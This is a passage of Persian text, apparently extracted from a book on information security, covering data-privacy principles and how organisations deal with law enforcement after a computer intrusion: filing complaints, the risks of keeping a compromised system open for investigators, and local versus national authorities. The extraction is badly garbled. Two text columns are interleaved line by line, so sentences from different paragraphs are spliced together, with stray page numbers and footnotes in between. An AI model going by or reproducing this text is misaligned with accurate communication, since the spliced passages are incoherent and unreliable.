ﺑﺎﺷﺪ .ﺑﺎﻳﺪ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ
ﺑﺘﻮﺍﻧﻨﺪ ﻃﺒﻴﻌﺖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ،ﻫﺪﻑ ﺍﺻﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻭ
ﻫﻤﭽﻨﻴﻦ ﻣﺪﺕ ﻣﺘﻌﺎﺭﻑ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﻌﻴﻦ ﻛﻨﻨﺪ.
١٢٨
ﺍﺻﻞ ﻣﺸﺎﺭﻛﺖ ﻓﺮﺩﻱ
ﻫﺮ ﻛﺴﻲ ﺑﺎﻳﺪ ﺍﻳﻦ ﺣﻖ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ:
ﺑﻔﻬﻤــﺪ ﺍﻃﻼﻋــﺎﺗﻲ ﺍﺯ ﻭﻱ ﺩﺭ ﺩﺳــﺖ ﮔﺮﺩﺁﻭﺭﻧــﺪﺓ o
ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ؛
oﺑﺎ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺧـﻮﺩ :ﺩﺭ ﻳـﻚ
ﺯﻣﺎﻥ ﻣﻌﻘﻮﻝ ،ﺑﺎ ﻫﺰﻳﻨﻪ ﺍﻱ ﺍﺭﺯﺍﻥ ،ﺑﺎ ﺭﻭﺷﻲ ﻣﻌﻘﻮﻝ،
ﻭ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻳﺶ ﺷـﻔﺎﻑ ﺑﺎﺷـﺪ ﺩﺭ
ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﺪ؛
oﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﺑـﺎﻻ ﺭﺩ ﺷـﺪ ﺑـﺮﺍﻱ ﺁﻥ
ﺩﻟﻴﻞ ﺑﺨﻮﺍﻫﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻪ ﭼﺎﻟﺶ ﺑﻜﺸﺪ؛ ﻭ
ﺁﻣﻮﺯﺵﺩﻳﺪﻩ ﻭ ﻧﻮﻉ ﻣﺤﻜﻮﻣﻴﺖ ﺗـﺼﻤﻴﻢ ﻣـﻲﮔﻴـﺮﺩ .ﺑـﻪ ﺧـﺎﻃﺮ ﺍﮔﺮ ﻣﺪﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻳﻚ ﺷﺮﻛﺖ ﺧـﺼﻮﺻﻲ ﺑﺎﺷـﻴﺪ ،ﺣﺘـﻲ •
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﻗﻀﺎﻳﻲ ﻣﻤﻠﻮ ﺍﺯ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﮔﻮﻧـﺎﮔﻮﻥ ﺍﮔﺮ ﺷـﺮﻛﺖ ﻓﺎﻗـﺪ ﺳـﻬﺎﻣﺪﺍﺭ ﻫـﻢ ﺑﺎﺷـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺍﺳﺖ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺩﺭ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﺟﺪﻳـﺪ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ،ﺣﺎﻣﻴﺎﻥ ﻭ ﻳـﺎ ﻣـﺸﺘﺮﻳﺎﻥ -ﺑـﺴﺘﻪ ﺑـﻪ
ﺩﺭﺻﻮﺭﺗﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺟﺮﺍﺋﻢ ﺧﺎﺹ ﻭ ﻳـﺎ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫـﺮ ﻛـﺸﻮﺭ -ﺍﺯ ﺷـﻤﺎ ﺷـﻜﺎﻳﺖ
ﻼ ﺍﺣﺘﻤــﺎﻝ ﺍﻧﺠــﺎﻡ ﺗﺤﻘﻴﻘــﺎﺕ ﺩﺭ
ﺗﻬﺪﻳــﺪﺍﺕ ﺟــﺪﻱ ﺑﺎﺷــﻨﺪ .ﻣــﺜ ﹰ ﻧﻤﺎﻳﻨﺪ.
ﭘﺮﻭﻧﺪﻩﺍﻱ ﻛﻪ ﺩﺭ ﺁﻥ ۲۰۰،۰۰۰ﺩﻻﺭ ﺩﺍﺩﻩ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘـﻪ ،ﺍﺯ ﻳـﻚ ﺍﮔﺮ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﻣﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﻪ
ﻣﻮﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻜﻨﻔﺮ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﻃﺮﻳﻖ ﻣـﻮﺩﻡ ،ﺭﺍﻳﺎﻧـﺔ ﺷﺨـﺼﻲ
ﺷﺪﺕ ﺩﺭ ﻣﻌﺮﺽ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭﺩﺍﺭﺩ ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﺑﻌﻨـﻮﺍﻥ ﺑﺨـﺸﻲ
ﺷﻤﺎ ﺭﺍ ﭘﻮﻳﺶ ﻣﻲﻛﻨﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺳﺖ. ﺍﺯ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺍﻣﻨﻴﺘـﻲ )ﻗﺒـﻞ ﺍﺯ ﻭﻗـﻮﻉ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ( ﺑـﺎ ﻣـﺸﺎﻭﺭ
ﺍﻃﻼﻋﺎﺕ ﺭﺍﺟﻊ ﺑﻪ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﺑﺸﻮﺩ ﻳـﺎ ﺣﻘﻮﻗﻲ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﮔﻔﺘﮕﻮ ﻛﻨﻴﺪ .ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺴﺘﻪ ﺑﻪ ﺩﺧﺎﻟﺖ ﻳـﺎ
ﻧــﺸﻮﺩ .ﺣﺘــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺟﺮﻳــﺎﻥ ﺗﺤﻘﻴﻘــﺎﺕ ﺍﻃﻼﻋــﺎﺕ ﻋﺪﻡ ﺩﺧﺎﻟﺖ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻣﺘﻔـﺎﻭﺗﻲ ﺭﺍ ﺍﺗﺨـﺎﺫ
ﻼ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﺎﺯﺭﺳـﺎﻥ ﺷـﺪﻳﺪﹰﺍ
ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ -ﻣﺜ ﹰ ﻣﻲ ﻛﻨﻨﺪ .ﺑﺎ ﺗﻤﺮﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺯﻣﺎﻥ ﺑﺤﺮﺍﻥ ،ﺍﺣﺘﻤﺎﻝ ﺩﻧﺒﺎﻝﺷﺪﻥ
ﻣﺸﻐﻮﻝ ﻛﺎﺭ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﻤﺎ ﮔﻔﺘﻪ ﺷﻮﺩ ﻫﻴﭽﮕﻮﻧﻪ ﺗﺤﻘﻴﻘـﺎﺗﻲ ﺩﺭ ﻭﺍﻗﻌﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺍﺳﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻴﺪ.
ﻛﺎﺭ ﻧﻴﺴﺖ.
ﺑﻌﻨﻮﺍﻥ ﭼﻨﺪ ﻣﻘﺪﻣﻪ ﺑﺮﺍﻱ ﺷﺮﻭﻉ ﺑﺤﺚ ،ﺍﻳﻦ ﻗﺴﻤﺖ ﻣـﺮﻭﺭﻱ ﺑـﺮ
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ،ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣـﻮﻗﻌﻴﺘﻲ ﭼﻨﺪ ﻣﺴﺌﻠﻪ -ﻛﻪ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﻗﻮﻱ ﺷﻤﺎ ﻧﻴﺰ ﺭﻭﺯﻱ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ
ﻧﺎﭘﺎﻳﺪﺍﺭ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ ﺑﻪ ﻧﻔﻮﺫ ﺧـﻮﺩ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻣﻲﺷﻮﻳﺪ -ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ:
ﺷﻤﺎ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺷـﻤﺎ ﺑﺨﻮﺍﻫﻨـﺪ
ﻛﻪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﺑﮕﺬﺍﺭﻳﺪ ﺗﺎ ﺑﺎﺯﺭﺳﺎﻥ ﺍﺗﺼﺎﻻﺕ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺗﻨﻈﻴﻢ ﺷﻜﻮﺍﺋﻴﻪ ﺟﺰﺍﻳﻲ
ﺭﺩﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﺳﺘﮕﻴﺮﻱ ﻣﺘﻬﻢ ﺑـﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﻣـﺪﺍﺭﻙ
ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺣـﺴﺎﺱ ﻛﻨﻴـﺪ ﻛـﺴﻲ ﺧـﻼﻑ
ﺑﭙﺮﺩﺍﺯﻧــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺑﺎﺯﮔﺬﺍﺷــﺘﻦ ﺩﺭﻫــﺎﻱ ﺳﻴــﺴﺘﻢ ﺑﻌــﺪ ﺍﺯ
ﻗﺎﻧﻮﻥ ﻋﻤﻞﻛﺮﺩﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻠﻴﻪ ﺍﻭ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻧﻤﺎﻳﻴﺪ ﻭ ﺍﻳـﻦ
ﻣﺸﺨﺺﺷﺪﻥ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ،
ﺭﻭﻧﺪ ﺑـﺎ ﺗﻨﻈـﻴﻢ ﺷـﻜﻮﺍﺋﻴﻪ ﻗـﻀﺎﻳﻲ ﺩﺭ ﻣﺮﺍﺟـﻊ ﺭﺳـﻤﻲ ﺷـﺮﻭﻉ
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺟﻬﺖ ﺍﻧﺠـﺎﻡ ﺧﺮﺍﺑﻜـﺎﺭﻱ
ﻣﻲﺷﻮﺩ .ﺳﭙﺲ ﺍﺯ ﺩﺍﺩﻳﺎﺭ ﺍﺟﺎﺯﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﺑـﺮ ﺍﺳـﺎﺱ
ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳـﻚ ﺩﺍﺩﻧﺎﻣـﺔ
ﺍﺩﻋﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺗﺤﻘﻴﻖ ﺑﻌﻤﻞ ﺁﻳﺪ ﻭ ﺍﮔﺮ ﺟﺮﻣﻲ ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ
ﺛﺎﻟﺚ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﻈﺎﻥ ﺍﺗﻬﺎﻡ ﻗـﺮﺍﺭ ﺩﻫـﺪ ،ﭼﺮﺍﻛـﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ
ﺷﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﻥ ﻳﻚ ﺩﺍﺩﺧﻮﺍﺳﺖ ﺗﻨﻈﻴﻢ ﺷﻮﺩ.
ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻣﺎﻧﻊ ﺍﺯ ﻭﺍﺭﺩ ﺷﺪﻥ ﺍﺗﻬﺎﻡ ﺑﻪ ﺷﻤﺎ ﻧﻴـﺴﺖ .ﭘـﺲ
ﺑﻬﺘﺮ ﺍﺳﺖ ﻗﺒﻞ ﺍﺯ ﭘـﺬﻳﺮﺵ ﭼﻨـﻴﻦ ﻣﺨـﺎﻃﺮﺍﺗﻲ ﺟﻮﺍﻧـﺐ ﺍﻣـﺮ ﺭﺍ ﺩﺭ ﺑﺮﺧﻲ ﻭ ﺷﺎﻳﺪ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ،ﺗﺤﻘﻴﻘﺎﺕ ﺟﻨﺎﻳﻲ ﻧﺘﻴﺠـﻪﺍﻱ ﺑـﺮﺍﻱ
ﻼ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ.ﻛﺎﻣ ﹰ ﺷﻤﺎ ﺩﺭ ﭘﻲ ﻧﺪﺍﺭﺩ .ﭼﻨﺎﻧﭽﻪ ﺍﻋﻤﺎﻝ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺗﻜـﺮﺍﺭ
ﻧﺸﻮﺩ ﻭ ﻧﻔﻮﺫﮔﺮ ﺭﺩﭘﺎﻳﻲ ﺍﺯ ﺧﻮﺩ ﺑـﺎﻗﻲ ﻧﮕﺬﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ،ﻳـﺎ ﺍﮔـﺮ
ﺗﻤﺎﺱ ﺑﺎ ﻣﺮﺍﺟﻊ ﻣﺮﺑﻮﻃﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺧـﺎﺭﺟﻲ ﻣـﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪ
ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﻮﻉ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ ﺑﺎﺷﺪ ،ﺑﺴﻴﺎﺭ ﺑﻌﻴﺪ ﺍﺳـﺖ ﻛـﻪ ﺑﺘﻮﺍﻧﻴـﺪ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ
ﻭ ﺟﺰﺍﺋﻲ ﺩﺭ ﻛﺸﻮﺭ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺳﺘﮕﻴﺮ ﻛﻨﻴﺪ .ﻧﻔﻮﺫﮔﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﺑﻨﺪﺭﺕ ﺍﺯ ﺧﻮﺩ ﺭﺩ ﭘﺎﻳﻲ ﺑـﺎﻗﻲ
١٣١
ﺍﻗﺪﺍﻣﺎﺕ ﺧﺎﺻﻲ ﺭﺍ ﺟﻬﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﻣﺴﺌﻮﻟﻴﻦ ﻣﺤﻠﻲ ﻳـﺎ ﻣﻲﮔﺬﺍﺭﻧﺪ.
ﻼ ﺑﻌﻀﻲ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﺁﻭﺭﺩﻩ ﺷـﺪﻩ ﻛﺸﻮﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ .ﺫﻳ ﹰ
ﺗﻨﻈﻴﻢ ﻭ ﺍﺭﺍﺋﻪ ﺷﻜﻮﺍﺋﻴﻪ ﻟﺰﻭﻣﹰﺎ ﺑﻪ ﺗﻌﻘﻴﺐ ﻗﻀﺎﻳﻲ ﻣﻨﺠﺮ ﻧﻤﻲﺷﻮﺩ.
ﺍﻣﺎ ﻃﺒﻴﻌﺘﹰﺎ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﻃﺒﻖ ﺭﻭﺷـﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻛـﺸﻮﺭ ﺧﻮﺩﺗـﺎﻥ
ﺩﺍﺩﻳﺎﺭ ﻣﺮﺑﻮﻃﻪ )ﺩﺭ ﺳﻄﻮﺡ ﻣﺨﺘﻠﻒ ﻛﺸﻮﺭﻱ ،ﺍﻳﺎﻟﺘﻲ ﻳﺎ ﻣﺤﻠﻲ( ﺩﺭ ﻣـﻮﺭﺩ
ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ.
ﻗــﺎﻧﻮﻥ ﻧﻘــﺾ ﺷــﺪﻩ ،ﺷــﺪﺕ ﺟــﺮﻡ ،ﻟــﺰﻭﻡ ﻫﻤﻜــﺎﺭﻱ ﺑﺎﺯﺭﺳــﺎﻥ
ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺍﻭﻝ ﺑـﻪ •
ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻳﺎ ﺍﺳﺘﺎﻧﻲ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ .ﺍﮔﺮ ﻣﺮﺍﺟﻊ ﺍﺳﺘﺎﻧﻲ
۱۳۱ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺑﺎﻫﻮﺵ ﻫـﺴﺘﻨﺪ
ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻛﻪ ﻣﺴﺌﻠﻪ ﺗﻮﺳﻂ ﻋﻮﺍﻣﻞ ﻛﺸﻮﺭﻱ ﺑﻬﺘـﺮ
ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ.
١٨١ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺭ ﺣﺎﻻﺕ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺻـﺮﻓﻨﻈﺮ ﻛﻨﻨـﺪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺗﺤﻘﻴـﻖ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﺑـﻪ ﺷـﻤﺎ ﭘﻴـﺸﻨﻬﺎﺩ
ﺗﺎ ﻓﻘﺪﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﭙﻮﺷﺎﻧﻨﺪ ﻭ ﺍﺯ ﺯﻳﺮ ﺳﺆﺍﻝ ﺭﻓﺘﻦ ﺍﻋﺘﺒﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻴـﺪ .ﻫﺮﭼﻨـﺪ ﻣﺘﺄﺳـﻔﺎﻧﻪ
ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨﺪ .ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻲ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﻋﻼﻗـﻪﺍﻱ ﺑـﻪ ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺍﻳـﺮ ﻣﺤﻠـ ﹺ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺧﻮﺩ ﻗﺮﺑﺎﻧﻲ ﻫﻢ ﺩﺭ ﻲ ﻣﺄﻣﻮﺭﺍﻥ ﻛﺸﻮﺭﻱ ﻧﺪﺍﺭﻧﺪ .ﺍﻳـﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻴﺮﻭﻱ ﻛﻤﻜ ﹺ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺟﻨﺎﻳﻲ ﻧﻘﺶ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻳـﻚ ﺑـﺎﺯﺭﺱ ﺑﺎﺗﺠﺮﺑـﻪ ﺩﺭ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺒﺐ ﺷﻮﺩ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ
ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ،ﺑﻪ ﻧﻈﺮﺍﺕ ﻗﺮﺑﺎﻧﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﻣﻞ ﻭ ﺑـﻲ ﺷـﻚ ﻭ ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﺗﺤﺖ ﺗﺤﻘﻴﻘﺎﺕ ﻗﺮﺍﺭ ﻧﮕﻴﺮﺩ.
ﺷﺒﻬﻪ ﻧﻤﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻫـﻢ ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ ﺷـﻜﺎﻳﺖ ﺷـﻤﺎ •
ﺻﺪﻕ ﻣﻲﻛﻨﺪ. ﻋﻼﻗﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ؛ ﭼـﻮﻥ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ
ﺍﮔﺮ ﺍﺯ ﺷﻤﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻧﺘﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛـﻪ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗﺤﻘﻴـﻖ ﻣﺸﻜﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺶ ﺁﻣﺪﻩ ﺩﺭ ﻛﻨﺎﺭ ﻫﺰﺍﺭﺍﻥ ﻣـﻮﺭﺩ
ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺧﺖ ﻣﻮﺿـﻮﻉ ﻣـﺸﺎﺭﻛﺖ ﻧﻤﺎﺋﻴـﺪ ،ﺍﻃﻤﻴﻨـﺎﻥ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ )ﺑﻪ ﺁﻥ ﺍﻧﺪﺍﺯﻩ ﻛـﻪ ﺩﺭ ﺳـﻄﺢ ﻛـﺸﻮﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ(
ﻳﺎﺑﻴﺪ ﻛﻪ ﺍﻳﻦ ﻋﻤﻞ ﺑﻪ ﺩﺳﺘﻮﺭ ﺩﺍﺩﮔﺎﻩ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳـﺖ؛ ﭼﺮﺍﻛـﻪ ﻗﺮﺍﺭ ﻧـﺪﺍﺭﺩ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤـﺎﻝ ﺑﻴـﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺧﻮﺍﻫـﺪ
ﺩﺭ ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﻨﻈــﺮ ﺑﻴﺎﻳــﺪ ﻛــﻪ ﻣــﺸﺘﺎﻕ ﺩﺍﺷﺖ ﻛﻪ ﻣﺴﺌﻮﻻﻥ ﻣﺤﻠـﻲ ﺑـﻪ ﻣـﺸﻜﻞ ﺷـﻤﺎ ﺍﻫﻤﻴـﺖ
ﻗﺮﺑﺎﻧﻲﺷﺪﻥ ﺑﻮﺩﻩﺍﻳﺪ .ﺑﻬﺘﺮ ﺍﺳﺖ ﻛـﻪ ﻳـﻚ ﺷـﺨﺺ ﺑﻴﻄـﺮﻑ ﺭﺍ ﺩﻫﻨﺪ؛ ﺣﺘﻲ ﺍﮔﺮ ﺁﻥ ﻣﺸﻜﻞ ﺧﻴﻠﻲ ﻛﻮﭼﻚ ﺑﺎﺷﺪ.
ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺩﻭﺍﻳﺮ ﺍﺟـﺮﺍﻱ
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺸﻜﻞ ﻓﻌﻠﻲ ﺷﻤﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﻣﺸﻜﻞ ﮔﺴﺘﺮﺩﻩﺗـﺮ ﺑﺎﺷـﺪ ﻛـﻪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﺷﻤﺎ ﺗﺤـﺖ ﺑﺎﺯﺭﺳـﻲ ﻭ
